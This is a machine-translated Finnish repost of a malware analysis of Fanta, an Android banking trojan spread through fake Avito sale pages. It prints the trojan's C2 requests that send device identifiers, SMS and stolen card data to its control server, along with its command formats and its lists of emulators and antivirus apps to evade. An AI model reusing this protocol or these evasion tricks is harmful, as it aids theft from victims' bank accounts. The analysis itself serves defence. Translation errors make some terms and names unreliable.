ProHoster > Blogi > netin uutisia > Leysya, Fanta: uusi taktiikka vanhalle Android-troijalaiselle

Leysya, Fanta: uusi taktiikka vanhalle Android-troijalaiselle

Leysya, Fanta: uusi taktiikka vanhalle Android-troijalaiselle

Eräänä päivänä haluat myydä jotain Avitossa ja lähetettyäsi yksityiskohtaisen kuvauksen tuotteestasi (esimerkiksi RAM-moduuli), saat tämän viestin:

Leysya, Fanta: uusi taktiikka vanhalle Android-troijalaiselleKun avaat linkin, näet vaarattoman sivun, joka ilmoittaa sinulle, iloiselle ja menestyvälle myyjälle, että osto on tehty:

Leysya, Fanta: uusi taktiikka vanhalle Android-troijalaiselle
Kun napsautat Jatka-painiketta, APK-tiedosto, jossa on kuvake ja luottamusta herättävä nimi, ladataan Android-laitteellesi. Asensit sovelluksen, joka jostain syystä pyysi AccessibilityService-oikeuksia, sitten pari ikkunaa ilmestyi ja katosi nopeasti ja... Siinä se.

Menet tarkistamaan saldosi, mutta jostain syystä pankkisovellus kysyy uudelleen korttitietojasi. Tietojen syöttämisen jälkeen tapahtuu jotain kauheaa: jostain sinulle vielä epäselvästä syystä rahaa alkaa kadota tililtäsi. Yrität ratkaista ongelman, mutta puhelimesi vastustaa: se painaa "Takaisin" ja "Koti"-näppäimiä, ei sammu eikä anna sinun aktivoida mitään turvatoimia. Tämän seurauksena jäät ilman rahaa, tavaroitasi ei ole ostettu, olet hämmentynyt ja ihmettelet: mitä tapahtui?

Vastaus on yksinkertainen: olet joutunut Flexnet-perheen jäsenen, Android Trojan Fantan uhriksi. Kuinka tämä tapahtui? Selitetään nyt.

Tekijät: Andrei Polovinkin, nuorempi asiantuntija haittaohjelmien analysoinnissa, Ivan Pisarev, haittaohjelmien analysoinnin asiantuntija.

Osa tilastoista

Android-troijalaisten Flexnet-perhe tuli tunnetuksi jo vuonna 2015. Melko pitkän toiminta-ajan aikana perhe laajeni useisiin alalajeihin: Fanta, Limebot, Lipton jne. Troijalainen ja siihen liittyvä infrastruktuuri eivät pysähdy: uusia tehokkaita jakelujärjestelmiä kehitetään - meidän tapauksessamme korkealaatuisia phishing-sivuja, jotka on suunnattu tietylle käyttäjälle-myyjälle, ja Troijan kehittäjät seuraavat muodikkaita trendejä viruskirjoitus - lisäämällä uusia toimintoja, jotka mahdollistavat tehokkaamman rahan varastamisen tartunnan saaneilta laitteilta ja ohittaa suojamekanismeja.

Tässä artikkelissa kuvattu kampanja on suunnattu käyttäjille Venäjältä, Ukrainassa havaittiin pieni määrä tartunnan saaneita laitteita ja vielä vähemmän Kazakstanissa ja Valko-Venäjällä.

Vaikka Flexnet on ollut Android Troijan areenalla jo yli 4 vuotta ja monet tutkijat ovat tutkineet sitä yksityiskohtaisesti, se on edelleen hyvässä kunnossa. Tammikuusta 2019 alkaen mahdollinen vahinkojen määrä on yli 35 miljoonaa ruplaa - ja tämä koskee vain kampanjoita Venäjällä. Vuonna 2015 tämän Android-troijalaisen eri versioita myytiin maanalaisilla foorumeilla, joista löytyi myös troijalaisen lähdekoodi yksityiskohtaisella kuvauksella. Tämä tarkoittaa, että maailman vahinkotilastot ovat vieläkin vaikuttavampia. Ei huono indikaattori niin vanhalle miehelle, eikö?

Leysya, Fanta: uusi taktiikka vanhalle Android-troijalaiselle

Myynnistä huijaukseen

Kuten aiemmin esitetystä kuvakaappauksesta näkyy Aviton Internet-palvelun tietojenkalastelusivusta, se oli valmistettu tiettyä uhria varten. Ilmeisesti hyökkääjät käyttävät yhtä Aviton jäsentäjistä, joka poimii myyjän puhelinnumeron ja nimen sekä tuotekuvauksen. Kun sivua on laajennettu ja APK-tiedosto valmisteltu, uhrille lähetetään tekstiviesti, jossa on hänen nimensä ja linkki tietojenkalastelusivulle, joka sisältää kuvauksen hänen tuotteestaan ​​ja tuotteen "myynnistä" saadun summan. Napsauttamalla painiketta käyttäjä saa haitallisen APK-tiedoston - Fanta.

Tutkimus shcet491[.]ru-verkkotunnuksesta osoitti, että se on delegoitu Hostingerin DNS-palvelimille:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

Toimialueen vyöhyketiedosto sisältää merkintöjä, jotka osoittavat IP-osoitteisiin 31.220.23[.]236, 31.220.23[.]243 ja 31.220.23[.]235. Verkkoalueen ensisijainen resurssitietue (A-tietue) osoittaa kuitenkin palvelimeen, jonka IP-osoite on 178.132.1[.]240.

IP-osoite 178.132.1[.]240 sijaitsee Alankomaissa ja kuuluu isännöitsijälle WorldStream. IP-osoitteet 31.220.23[.]235, 31.220.23[.]236 ja 31.220.23[.]243 sijaitsevat Isossa-Britanniassa ja kuuluvat jaetulle hosting-palvelimelle HOSTINGER. Käytetty tallentimena openprov-ru. Myös seuraavat verkkotunnukset ratkaistiin IP-osoitteeksi 178.132.1[.]240:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

On huomattava, että linkit seuraavassa muodossa olivat saatavilla melkein kaikista verkkotunnuksista:

http://(www.){0,1}<%domain%>/[0-9]{7}

Tämä malli sisältää myös linkin tekstiviestistä. Historiallisten tietojen perusteella havaittiin, että yksi verkkotunnus vastaa useita linkkejä yllä kuvatussa mallissa, mikä viittaa siihen, että yhtä verkkotunnusta käytettiin troijalaisen levittämiseen useille uhreille.

Mennään hieman eteenpäin: tekstiviestistä linkin kautta ladattu troijalainen käyttää osoitetta ohjauspalvelimena onusedseddohap[.]klubi. Tämä verkkotunnus rekisteröitiin 2019-03-12, ja 2019-04-29 alkaen APK-sovellukset olivat vuorovaikutuksessa tämän verkkotunnuksen kanssa. VirusTotalista saatujen tietojen perusteella yhteensä 109 sovellusta oli vuorovaikutuksessa tämän palvelimen kanssa. Verkkotunnus itse ratkesi IP-osoitteeksi 217.23.14[.]27, joka sijaitsee Alankomaissa ja omistaa isännöitsijän WorldStream. Käytetty tallentimena namecheap. Myös verkkotunnukset on ratkaistu tähän IP-osoitteeseen bad-racoon[.]klubi (alkaen 2018) ja bad-racoon[.]live (alkaen 2018). Verkkotunnuksen kanssa bad-racoon[.]klubi yli 80 APK-tiedostoa oli vuorovaikutuksessa bad-racoon[.]live - yli 100.

Yleensä hyökkäys etenee seuraavasti:

Leysya, Fanta: uusi taktiikka vanhalle Android-troijalaiselle

Mitä Fantan kannen alla on?

Kuten monet muut Android-troijalaiset, Fanta pystyy lukemaan ja lähettämään tekstiviestejä, tekemään USSD-pyyntöjä ja näyttämään omia ikkunoitaan sovellusten päällä (mukaan lukien pankkisovellukset). Tämän perheen toimivuusarsenaali on kuitenkin saapunut: Fanta alkoi käyttää AccessibilityService eri tarkoituksiin: muiden sovellusten ilmoitusten sisällön lukeminen, troijalaisen havaitsemisen estäminen ja sen suorittamisen pysäyttäminen tartunnan saaneessa laitteessa jne. Fanta toimii kaikissa Android-versioissa, jotka eivät ole nuorempia kuin 4.4. Tässä artikkelissa tarkastellaan lähemmin seuraavaa Fanta-näytettä:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Heti käynnistämisen jälkeen

Välittömästi käynnistämisen jälkeen troijalainen piilottaa kuvakkeensa. Sovellus voi toimia vain, jos tartunnan saaneen laitteen nimi ei ole luettelossa:

  • android_x86
  • VirtualBox
  • Nexus 5X (bullhead)
  • Nexus 5 (parranajokone)

Tämä tarkistus suoritetaan Troijan pääpalvelussa - Pääpalvelu. Ensimmäisen käynnistyksen yhteydessä sovelluksen konfigurointiparametrit alustetaan oletusarvoihin (konfiguraatiotietojen tallennusmuotoa ja niiden merkitystä käsitellään myöhemmin) ja uusi tartunnan saanut laite rekisteröidään ohjauspalvelimelle. HTTP POST -pyyntö viestityypin kanssa lähetetään palvelimelle register_bot ja tiedot tartunnan saaneesta laitteesta (Android-versio, IMEI, puhelinnumero, operaattorin nimi ja maakoodi, johon operaattori on rekisteröity). Osoite toimii ohjauspalvelimena hXXp://onuseseddohap[.]club/controller.php. Palvelin lähettää vastauksena kentät sisältävän viestin bot_id, bot_pwd, palvelin — sovellus tallentaa nämä arvot CnC-palvelimen parametreiksi. Parametri palvelin valinnainen, jos kenttää ei ole vastaanotettu: Fanta käyttää rekisteröintiosoitetta - hXXp://onuseseddohap[.]club/controller.php. CnC-osoitteen muuttamistoiminnolla voidaan ratkaista kaksi ongelmaa: jakaa kuormitus tasaisesti useiden palvelimien kesken (jos tartunnan saaneita laitteita on paljon, voi optimoimattoman web-palvelimen kuormitus olla suuri) sekä käyttää vaihtoehtoinen palvelin, jos jokin CnC-palvelimista epäonnistuu.

Jos pyyntöä lähetettäessä tapahtuu virhe, troijalainen toistaa rekisteröintiprosessin 20 sekunnin kuluttua.

Kun laite on rekisteröity onnistuneesti, Fanta näyttää käyttäjälle seuraavan viestin:

Leysya, Fanta: uusi taktiikka vanhalle Android-troijalaiselle
Tärkeä huomautus: palvelu soitti Järjestelmän turvallisuus - Troijan palvelun nimi ja napsautuksen jälkeen ОК Näyttöön tulee ikkuna tartunnan saaneen laitteen esteettömyysasetuksista, jossa käyttäjän on myönnettävä haittapalvelun esteettömyysoikeudet:

Leysya, Fanta: uusi taktiikka vanhalle Android-troijalaiselle
Heti kun käyttäjä kytkeytyy päälle AccessibilityService, Fanta saa pääsyn sovellusikkunoiden sisältöön ja niissä suoritettuihin toimiin:

Leysya, Fanta: uusi taktiikka vanhalle Android-troijalaiselle
Välittömästi saavutettavuusoikeuksien saatuaan troijalainen pyytää järjestelmänvalvojan oikeuksia ja oikeuksia lukea ilmoituksia:

Leysya, Fanta: uusi taktiikka vanhalle Android-troijalaiselle
AccessibilityServicen avulla sovellus simuloi näppäinpainalluksia ja antaa siten itselleen kaikki tarvittavat oikeudet.

Fanta luo useita tietokantaesiintymiä (jotka kuvataan myöhemmin), jotka ovat välttämättömiä konfigurointitietojen sekä prosessin aikana kerätyn tiedon tallentamiseen tartunnan saaneesta laitteesta. Kerättyjen tietojen lähettämiseksi troijalainen luo toistuvan tehtävän, joka on suunniteltu lataamaan kenttiä tietokannasta ja vastaanottamaan komennon ohjauspalvelimelta. CnC:n käytön aikaväli asetetaan Android-version mukaan: 5.1:n tapauksessa aikaväli on 10 sekuntia, muuten 60 sekuntia.

Saadakseen komennon Fanta tekee pyynnön GetTask hallintapalvelimelle. Vastauksena CnC voi lähettää jonkin seuraavista komennoista:

Joukkue Kuvaus
0 Lähetä tekstiviesti
1 Soita puhelu tai USSD-komento
2 Päivittää parametrin intervalli
3 Päivittää parametrin siepata
6 Päivittää parametrin smsManager
9 Aloita tekstiviestien kerääminen
11 Palauta puhelimesi tehdasasetukset
12 Ota käyttöön/poista käytöstä valintaikkunan luomisen kirjaaminen

Fanta kerää myös ilmoitukset 70 pankkisovelluksesta, nopeasta maksujärjestelmästä ja e-lompakosta ja tallentaa ne tietokantaan.

Konfigurointiparametrien tallennus

Konfigurointiparametrien tallentamiseen Fanta käyttää Android-alustalle tavallista lähestymistapaa - Asetukset-tiedostot. Asetukset tallennetaan tiedostoon nimeltä settings. Tallennettujen parametrien kuvaus on alla olevassa taulukossa.

nimi Oletusarvo Mahdolliset arvot Kuvaus
id 0 Kokonaisluku Botin tunnus
palvelin hXXp://onuseseddohap[.]club/ URL Hallitse palvelimen osoitetta
pwd - jono Palvelin salasana
intervalli 20 Kokonaisluku Aikaväli. Ilmaisee, kuinka kauan seuraavia tehtäviä tulee lykätä:

  • Kun lähetät pyynnön lähetetyn tekstiviestin tilasta
  • Vastaanotetaan uusi komento hallintapalvelimelta
siepata kaikki kaikki/puhelinnumero Jos kenttä on yhtä suuri kuin merkkijono kaikki tai telNumber, sovellus sieppaa vastaanotetun tekstiviestin, eikä sitä näytetä käyttäjälle
smsManager 0 0/1 Ota sovellus käyttöön tai poista se käytöstä tekstiviestien oletusvastaanottajana
readDialog väärä Totta/epätosi Ota tapahtumaloki käyttöön/poista käytöstä Accessibility Event

Myös Fanta käyttää tiedostoa smsManager:

nimi Oletusarvo Mahdolliset arvot Kuvaus
pckg - jono Käytetyn tekstiviestien hallinnan nimi

Vuorovaikutus tietokantojen kanssa

Troijalainen käyttää toimintansa aikana kahta tietokantaa. Tietokanta nimeltä a käytetään tallentamaan erilaisia ​​puhelimesta kerättyjä tietoja. Toinen tietokanta on nimetty fanta.db ja sitä käytetään tallentamaan asetukset, jotka ovat vastuussa tietojenkalasteluikkunoiden luomisesta, jotka on suunniteltu keräämään tietoja pankkikorteista.

Troijalainen käyttää tietokantaa а tallentaa kerätyt tiedot ja kirjata toimintasi. Tiedot tallennetaan taulukkoon lokit. Luo taulukko käyttämällä seuraavaa SQL-kyselyä:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Tietokanta sisältää seuraavat tiedot:

1. Saastuneen laitteen käynnistyksen kirjaaminen viestillä Puhelin käynnistyi!

2. Ilmoitukset sovelluksista. Viesti luodaan seuraavan mallin mukaan:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Pankkikorttitiedot Troijalaisen luomista phishing-lomakkeista. Parametri VIEW_NAME voi olla jokin seuraavista:

  • AliExpress
  • Avito
  • Google Play
  • Sekalaista <%App Name%>

Viesti kirjataan muodossa:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Saapuvat/lähtevät tekstiviestit muodossa:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Tietoa paketista, joka luo valintaikkunan muodossa:

(<%Package name%>)<%Package information%>

Esimerkkitaulukko lokit:

Leysya, Fanta: uusi taktiikka vanhalle Android-troijalaiselle
Yksi Fantan toiminnoista on pankkikorttitietojen kerääminen. Tietojen kerääminen tapahtuu luomalla phishing-ikkunoita pankkisovelluksia avattaessa. Troijalainen luo tietojenkalasteluikkunan vain kerran. Tieto siitä, että ikkuna näytettiin käyttäjälle, on tallennettu taulukkoon settings tietokannassa fanta.db. Luo tietokanta käyttämällä seuraavaa SQL-kyselyä:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Kaikki taulukon kentät settings oletuksena alustettu arvoon 1 (luo tietojenkalasteluikkuna). Kun käyttäjä on syöttänyt tietonsa, arvoksi tulee 0. Esimerkki taulukon kentistä settings:

  • can_login — kenttä vastaa lomakkeen näyttämisestä pankkihakemusta avattaessa
  • ensimmäinen_pankki - ei käytetty
  • can_avito — kenttä vastaa lomakkeen näyttämisestä Avito-sovellusta avattaessa
  • can_ali — kenttä vastaa lomakkeen näyttämisestä Aliexpress-sovellusta avattaessa
  • voi_toisen — kenttä vastaa lomakkeen näyttämisestä, kun hakemus avataan luettelosta: Yula, Pandao, Drom Auto, Lompakko. Alennus- ja bonuskortit, Aviasales, Varaukset, Trivago
  • can_card — kenttä vastaa lomakkeen näyttämisestä avattaessa Google Play

Vuorovaikutus hallintapalvelimen kanssa

Verkkovuorovaikutus hallintapalvelimen kanssa tapahtuu HTTP-protokollan kautta. Verkon kanssa toimimiseen Fanta käyttää suosittua Retrofit-kirjastoa. Pyynnöt lähetetään osoitteeseen: hXXp://onuseseddohap[.]club/controller.php. Palvelimen osoitetta voidaan muuttaa rekisteröityessäsi palvelimelle. Evästeitä voidaan lähettää vastauksena palvelimelta. Fanta tekee seuraavat pyynnöt palvelimelle:

  • Botin rekisteröinti ohjauspalvelimelle tapahtuu kerran, ensimmäisen käynnistyksen yhteydessä. Seuraavat tiedot tartunnan saaneesta laitteesta lähetetään palvelimelle:
    · Cookie — palvelimelta saadut evästeet (oletusarvo on tyhjä merkkijono)
    · tila - merkkijonovakio register_bot
    · etuliite — kokonaislukuvakio 2
    · version_sdk — muodostetaan seuraavan mallin mukaan: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · IMEI — tartunnan saaneen laitteen IMEI
    · maa — sen maan koodi, jossa operaattori on rekisteröity, ISO-muodossa
    · numero - puhelinnumero
    · operaattori - operaattorin nimi

    Esimerkki palvelimelle lähetetystä pyynnöstä:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>

    Vastauksena pyyntöön palvelimen on palautettava JSON-objekti, joka sisältää seuraavat parametrit:
    · bot_id — tartunnan saaneen laitteen tunnus. Jos bot_id on 0, Fanta suorittaa pyynnön uudelleen.
    bot_pwd — palvelimen salasana.
    palvelin — valvoa palvelimen osoitetta. Valinnainen parametri. Jos parametria ei ole määritetty, käytetään sovellukseen tallennettua osoitetta.

    Esimerkki JSON-objektista:

    {
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}

  • Pyydä saada komento palvelimelta. Seuraavat tiedot lähetetään palvelimelle:
    · Cookie — palvelimelta saadut evästeet
    · tarjous — tartunnan saaneen laitteen tunnus, joka vastaanotettiin pyyntöä lähetettäessä register_bot
    · pwd - palvelimen salasana
    · divice_admin — kenttä määrittää, onko järjestelmänvalvojan oikeudet hankittu. Jos järjestelmänvalvojan oikeudet on hankittu, kenttä on yhtä suuri kuin 1, muuten 0
    · Käytettävyys: — Esteettömyyspalvelun toimintatila. Jos palvelu käynnistettiin, arvo on 1, muuten 0
    · SMSManager — näyttää, onko troijalainen käytössä oletussovelluksena tekstiviestien vastaanottamiseen
    · kuvaruutu — näyttää, missä tilassa näyttö on. Arvo asetetaan 1, jos näyttö on päällä, muuten 0;

    Esimerkki palvelimelle lähetetystä pyynnöstä:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Komennosta riippuen palvelin voi palauttaa JSON-objektin erilaisilla parametreilla:

    · Joukkue Lähetä tekstiviesti: Parametrit sisältävät puhelinnumeron, tekstiviestin tekstin ja lähetettävän viestin tunnuksen. Tunnistetta käytetään, kun palvelimelle lähetetään viesti tyypin kanssa setSmsStatus. 

    {
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}

    · Joukkue Soita puhelu tai USSD-komento: Puhelinnumero tai komento tulee vastaustekstiin. 

    {
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}

    · Joukkue Muuta intervalliparametria. 

    {
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}

    · Joukkue Muuta leikkausparametria. 

    {
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}

    · Joukkue Muuta SmsManager-kenttää. 

    {
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

    · Joukkue Kerää tekstiviestejä tartunnan saaneelta laitteelta.

    {
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}

    · Joukkue Palauta puhelimesi tehdasasetukset: 

    {
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}

    · Joukkue Muuta ReadDialog-parametria. 

    {
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

  • Viestin lähettäminen tyypin kanssa setSmsStatus. Tämä pyyntö tehdään komennon suorittamisen jälkeen Lähetä tekstiviesti. Pyyntö näyttää tältä:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Tietokannan sisällön lataaminen. Yksi rivi lähetetään per pyyntö. Seuraavat tiedot lähetetään palvelimelle:
    · Cookie — palvelimelta saadut evästeet
    · tila - merkkijonovakio setSaveInboxSms
    · tarjous — tartunnan saaneen laitteen tunnus, joka vastaanotettiin pyyntöä lähetettäessä register_bot
    · teksti — teksti nykyisessä tietokantatietueessa (kenttä d pöydältä lokit tietokannassa а)
    · numero — nykyisen tietokantatietueen nimi (kenttä p pöydältä lokit tietokannassa а)
    · sms_mode — kokonaislukuarvo (kenttä m pöydältä lokit tietokannassa а)

    Pyyntö näyttää tältä:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Jos rivi on lähetetty palvelimelle onnistuneesti, se poistetaan taulukosta. Esimerkki palvelimen palauttamasta JSON-objektista:

    {
    "response":[],
    "status":"ok"
}

Vuorovaikutus AccessibilityServicen kanssa

AccessibilityService otettiin käyttöön Android-laitteiden käytön helpottamiseksi vammaisille. Useimmissa tapauksissa tarvitaan fyysistä vuorovaikutusta vuorovaikutuksessa sovelluksen kanssa. AccessibilityServicen avulla voit tehdä ne ohjelmallisesti. Fanta käyttää palvelua väärennettyjen ikkunoiden luomiseen pankkisovelluksiin ja estää käyttäjiä avaamasta järjestelmäasetuksia ja joitain sovelluksia.

AccessibilityServicen toiminnallisuuden avulla troijalainen tarkkailee muutoksia tartunnan saaneen laitteen näytön elementteihin. Kuten aiemmin on kuvattu, Fanta-asetuksissa on parametri, joka vastaa toimintojen kirjaamisesta valintaikkunoilla - readDialog. Jos tämä parametri on asetettu, tietokantaan lisätään tiedot tapahtuman käynnistäneen paketin nimestä ja kuvauksesta. Troijalainen suorittaa seuraavat toimet, kun tapahtumia käynnistetään:

  • Simuloi paluu- ja kotinäppäinten painamista seuraavissa tapauksissa:
    · jos käyttäjä haluaa käynnistää laitteensa uudelleen
    · jos käyttäjä haluaa poistaa "Avito"-sovelluksen tai muuttaa käyttöoikeuksia
    · jos sivulla on maininta "Avito"-sovelluksesta
    · kun avaat Google Play Protect -sovelluksen
    · avattaessa sivuja AccessibilityServicen asetuksilla
    · kun Järjestelmän suojaus -valintaikkuna tulee näkyviin
    · kun avaat sivun "Piirrä muun sovelluksen päälle" -asetuksella
    · kun avaat "Sovellukset"-sivun, "Palautus ja nollaus", "Tietojen nollaus", "Nollaa asetukset", "Kehittäjäpaneeli", "Erikois. mahdollisuudet", "Erikoismahdollisuudet", "Erikoisoikeudet"
    · jos tapahtuma on luotu tietyillä sovelluksilla.

    Luettelo sovelluksista

    • android
    • Master Lite
    • Clean Master
    • Clean Master x86-suorittimelle
    • Meizu-sovelluksen käyttöoikeuksien hallinta
    • MIUI-suojaus
    • Clean Master - Virustentorjunta, välimuisti ja roskien puhdistus
    • Lapsilukko ja GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Web Security Beta
    • Virustorjunta, virustentorjunta, puhdistusaine (MAX Security)
    • Mobile AntiVirus Security PRO
    • Avast virustorjunta ja ilmainen suojaus 2019
    • Mobile Security MegaFon
    • AVG-suojaus Xperialle
    • Mobiiliturvallisuus
    • Malwarebytes Antivirus & Protection
    • Virustorjunta Android 2019:lle
    • Security Master - Virustorjunta, VPN, AppLock, Booster
    • AVG virustorjunta Huawei tabletin System Managerille
    • Samsungin esteettömyys
    • Samsung Smart Manager
    • Turvallisuusmestari
    • Speed ​​Booster
    • Dr.Web
    • Dr.Web Security Space
    • Dr.Web Mobile Control Center
    • Dr.Web Security Space Life
    • Dr.Web Mobile Control Center
    • Virustorjunta ja mobiiliturva
    • Kaspersky Internet Security: Virustentorjunta ja suojaus
    • Kaspersky Battery Life: Saver & Booster
    • Kaspersky Endpoint Security - suojaus ja hallinta
    • AVG Antivirus ilmainen 2019 – Suojaus Androidille
    • Android Antivirus
    • Norton Mobile Security and Antivirus
    • Virustorjunta, palomuuri, VPN, mobiilisuojaus
    • Mobiiliturvallisuus: virustorjunta, VPN, varkaussuojaus
    • Virustorjunta Androidille

  • Jos lupaa pyydetään lähetettäessä tekstiviesti lyhytnumeroon, Fanta simuloi valintaruudun napsauttamista Muista valinta ja nappi lähettää.
  • Kun yrität ottaa troijalaiselta järjestelmänvalvojan oikeudet, se lukitsee puhelimen näytön.
  • Estää uusien ylläpitäjien lisäämisen.
  • Jos virustorjuntasovellus dr.web havaittu uhka, Fanta jäljittelee napin painamista jättää huomiotta.
  • Troijalainen simuloi paluu- ja kotipainikkeen painamista, jos tapahtuma on sovelluksen luoma Samsung Device Care.
  • Fanta luo phishing-ikkunoita, joissa on lomakkeita pankkikorttitietojen syöttämiseen, jos noin 30 eri Internet-palvelun luettelosta käynnistetään sovellus. Niistä: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto jne.

    Tietojenkalastelulomakkeet

    Fanta analysoi, mitkä sovellukset ovat käynnissä tartunnan saaneessa laitteessa. Jos kiinnostava sovellus avattiin, troijalainen näyttää kaikkien muiden päällä tietojenkalasteluikkunan, joka on lomake pankkikorttitietojen syöttämiseen. Käyttäjän tulee syöttää seuraavat tiedot:

    • Kortin numero
    • Kortin viimeinen voimassaolopäivä
    • CVV
    • Kortinhaltijan nimi (ei kaikille pankeille)

    Käynnissä olevasta sovelluksesta riippuen näyttöön tulee erilaisia ​​phishing-ikkunoita. Alla on esimerkkejä joistakin niistä:

    AliExpress:

    Leysya, Fanta: uusi taktiikka vanhalle Android-troijalaiselle
    Avito:

    Leysya, Fanta: uusi taktiikka vanhalle Android-troijalaiselle
    Joihinkin muihin sovelluksiin, esim. Google Play Market, Aviasales, Pandao, Varaus, Trivago:
    Leysya, Fanta: uusi taktiikka vanhalle Android-troijalaiselle

    Miten se oikeasti oli

    Onneksi artikkelin alussa kuvatun tekstiviestin vastaanottanut henkilö osoittautui kyberturvallisuuden asiantuntijaksi. Siksi todellinen, ei-ohjaajan versio eroaa aiemmin kerrotusta: henkilö sai mielenkiintoisen tekstiviestin, jonka jälkeen hän antoi sen Group-IB Threat Hunting Intelligence -tiimille. Hyökkäyksen tulos on tämä artikkeli. Onnellinen loppu, eikö? Kaikki tarinat eivät kuitenkaan pääty niin onnistuneesti, ja jotta omasi ei näyttäisi ohjaajan leikkaukselta rahahäviöllä, useimmissa tapauksissa riittää, että noudatat seuraavia pitkään kuvattuja sääntöjä:

    • älä asenna sovelluksia Android-käyttöjärjestelmää käyttävään mobiililaitteeseen muista lähteistä kuin Google Playsta
    • Kun asennat sovellusta, kiinnitä erityistä huomiota sovelluksen vaatimiin oikeuksiin
    • kiinnitä huomiota ladattujen tiedostojen laajennuksiin
    • asenna Android-käyttöjärjestelmän päivitykset säännöllisesti
    • Älä vieraile epäilyttävissä resursseissa äläkä lataa tiedostoja sieltä
    • Älä napsauta tekstiviesteissä saatuja linkkejä.

Lähde: will.com

Lisää kommentti